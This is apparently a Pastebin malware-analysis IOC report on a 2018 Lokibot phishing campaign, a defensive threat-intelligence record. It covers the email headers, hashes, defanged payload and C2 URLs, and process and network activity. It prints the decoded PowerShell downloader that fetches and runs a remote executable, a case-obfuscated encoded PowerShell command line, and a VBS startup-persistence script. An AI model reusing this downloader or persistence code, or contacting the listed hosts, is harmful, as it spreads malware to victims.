Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Lokibot #X97M #macro #powershell
- https://pastebin.com/LPqjHUkQ
- FAQ:
- https://radetskiy.wordpress.com/?s=lokibot
- attack_vector
- --------------
- email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe
- email_headers
- --------------
- Received: from gunimo.com ([159.65.179.93])
- by mailsrv2.victim1.com (8.15.2/8.15.2) with ESMTP id w9GDZxoi074233
- for <user0@org2.victim1.com>; Tue, 16 Oct 2018 16:35:59 +0300 (EEST)
- (envelope-from replymail202@gmail.com)
- Received: from [103.99.1.148] (helo=User)
- by gunimo.com with esmtpa (Exim 4.84_2)
- (envelope-from <replymail202@gmail.com>)
- id 1gCPVH-00082K-4q; Tue, 16 Oct 2018 13:35:24 +0000
- Reply-To: <replymail202@gmail.com>
- From: "FREDRICK (BESTLABS)"<replymail202@gmail.com>
- Subject: Purchase Order (BESTLABS)
- Date: Tue, 16 Oct 2018 06:35:11 -0700
- email_subjects
- --------------
- Purchase Order (BESTLABS)
- files
- --------------
- SHA-256 a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552
- File name 87041166.xls
- File size 61 KB
- SHA-256 078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c
- File name chri1.jpg This program must be run under Win32
- File size 661 KB
- activity
- **************
- payload
- 181.174.165.161 http://octap{.} igg{.} biz/01/chri1.jpg
- C2
- 103.109.184.60 http://octone{.} igg{.} biz/chri1/cgi.php
- netwrk
- --------------
- 181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User Agent
- 103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
- comp
- --------------
- powershell.exe 1148 181.174.165.161 80 ESTABLISHED
- [System Process] 0 103.109.184.60 80 TIME_WAIT
- [System Process] 0 103.109.184.60 80 TIME_WAIT
- iigyhe.exe 2364 103.109.184.60 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e\
- C:\Windows\SysWOW64\cMD.exe cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARAAzAG8AQgBYAGQASABiAHMANwA4AH...
- "C:\Users\operator\MyP8Mihuih.exe"
- "C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
- "C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"
- base64_decode
- ---------------
- function D3oBXdHbs78ytXnPChs ( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL )
- {(New-Object System.Net.WebClient).DownloadFile( $NESUp2oGBWEZeslGaAmpDeDWO , $zZLx5PqAyovtf8HsUEDmfbEGOL );
- (New-Object -com Shell.Application).ShellExecute( $zZLx5PqAyovtf8HsUEDmfbEGOL ); }
- try{
- $mVLKMABGL2alewvZd2=$env:USERPROFILE+'\MyP8Mihuih.exe';
- D3oBXdHbs78ytXnPChs 'http://octap{.} igg{.} biz/01/chri1.jpg' $mVLKMABGL2alewvZd2;
- }catch{}
- persist
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 17.10.2018 17:03
- iihge.vbs c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\iihge.vbs 17.10.2018 17:03
- vbs
- --------------
- Set qqRtjAUYnqWIRiSE = CreateOBject("wScriPt.sheLl")
- qQrTjAUyNQwIRise.rUn """C:\Users\operator\AppData\Roaming\iihge\iigyhe.exe"""
- drop
- --------------
- C:\Users\operator\MyP8Mihuih.exe
- C:\Users\operator\AppData\Roaming\39B01F
- C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
- C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
- C:\Users\operator\AppData\Roaming\iihge
- # # #
- https://www.virustotal.com/#/file/a0735fd6ae06e59370e2702bdfda81f90d9b2489f3a483104469a0f4c596d552/details
- https://www.virustotal.com/#/file/078028b6a99daeb8576b1c33073732b0b65bd6c4eddcc2b061fdadf037e9063c/details
- https://analyze.intezer.com/#/analyses/a8e828da-f1f2-4817-ad4d-4c004486deb4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement